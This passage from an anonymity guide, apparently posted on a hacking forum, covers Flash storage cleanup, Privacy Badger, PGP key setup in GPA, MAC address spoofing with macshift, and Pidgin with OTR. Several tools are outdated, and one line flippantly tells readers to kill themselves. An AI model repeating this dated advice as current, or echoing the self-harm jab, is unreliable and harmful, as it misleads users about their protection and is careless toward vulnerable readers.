-> User name -> AppData -> Roaming -> Macromedia -> Flash Player > macromedia.com -> support -> flashplayer -> sys 2. Then go to ‘Exclude’ and ‘Add’: C:\ -> Users -> User name -> AppData -> Roaming -> Macromedia -> Flash Player -> macromedia.com -> support -> flashplayer -> sys -> settings.sol Windows XP users should: 1. Include: C\: -> Documents and Settings -> User name -> Application Data -> Roaming -> Macromedia -> Flash Player -> macromedia.com -> support -> flashplayer -> sys and C -> Documents and Settings -> User name -> Application Data -> Roaming -> Macromedia -> Flash Player -> #SharedObjects 2. Exclude: C\: -> Documents and Settings -> User name -> Application Data -> Roaming -> Macromedia -> Flash Player -> macromedia.com -> support -> flashplayer -> sys -> settings.sol HTML web storage CLEARNET LINK: https://addons.mozilla.org/en-US/firefox/addon/betterprivacy/ This extension is said to remove web storage automatically on a regular basis. Privacy Badger CLEARNET LINK: https://www.eff.org/privacybadger Privacy Badger is a browser add-on that stops advertisers and other third-party trackers from secretly tracking where you go and what pages you look at on the web. If an advertiser seems to be tracking you across multiple websites without your permission, Privacy Badger automatically blocks that advertiser from loading any more content in your browser. To the advertiser, it's like you suddenly disappeared. Red means Privacy Badger believes this domain is a tracker, and has blocked it. Yellow means the domain is believed to be both a tracker and necessary for the functioning of the page, so Privacy Badger is allowing it but blocking its cookies. Green means that Privacy Badger believes this is not tracker. Other very useful Browser Extensions are: Lastly use Duck Duck Go or Startpage INSTEAD of Google. Google = bad bad bad! === 3. PGP Encryption If you aren't using PGP Encryption when sending messages you might as well off yourself right now. It is extremely vital to use it. As Ping once said 'The longer the better '. Download GPG4Win Here: CLEARNET LINK: Gpg4win - Secure email and file encryption with GnuPG for Windows Run the downloaded file and select to install only Kleopatra and GPA. Open GPA Keys > New Key Fill in the information with whatever you want people to see your public key as. NOTE: DO NOT USE YOUR REAL NAME! After selecting your alias it asks for an e-mail adress. This e-mail should be non existent, and be linked to a website that also doesn’t exist. Take the example below: Then make a backup of your key. Find where you put the back up of your key. It will be an .asc file. Open it with Notepad. When sharing your key with others, you wan’t to copy and paste from the beginning dashes to the end dashes. To import other people's keys into GPA, create a blank text document. Paste their key in. Open GPA. Import Keys. Select File. Confirm. Done. SENDING AN ENCRYPTED MESSAGE: 1. Open GPA. 2. Open up clipboard. 3. Write your message. 4. Encrypt. Choose the receiver's key. 5. You'll now have an encrypted message. 6. Just email/message that to them. To decrypt a message sent to you: 1. Open GPA. 2. Open Clipboard. 3. Paste funky looking message. 4. Decrypt - enter password. === 4. Changing Your Mac Address CLEARNET LINK: http://devices.natetrue.com/macshift/ Very easy. Download, open cmd, run macshift -r -i "Wireless" #If you're using Wireless macshift -r -i "Ethernet" #If you're using Ethernet 5. Anonymous IM CLEARNET LINKS: https://www.pidgin.im/ + https://otr.cypherpunks.ca/ Run both installers - pidgin with the default settings. Set it up how you want, currently I only have it set up for Google Hangouts which kind of defeats the purpose. If I can get it set up later, I'll edit this. ONLY USE XMPP If you want to connect to a hidden service, for example the jabber.ccc.de hidden service I use the following configuration: 6. Anti-virus 10/10 would recommend the AVG + Malwarebytes combo. If someone lands malware on your machine, you're 110% fucked. Nuff said. === Lastly, if you want to be the safest, run it in a virtual machine. To Hackerjon - I wrote this following your restrictions (no VM, no Tails, no Linux). Having all three of those is by far your safest bet, but whatever. === Source: hell
×
×
  • Create New...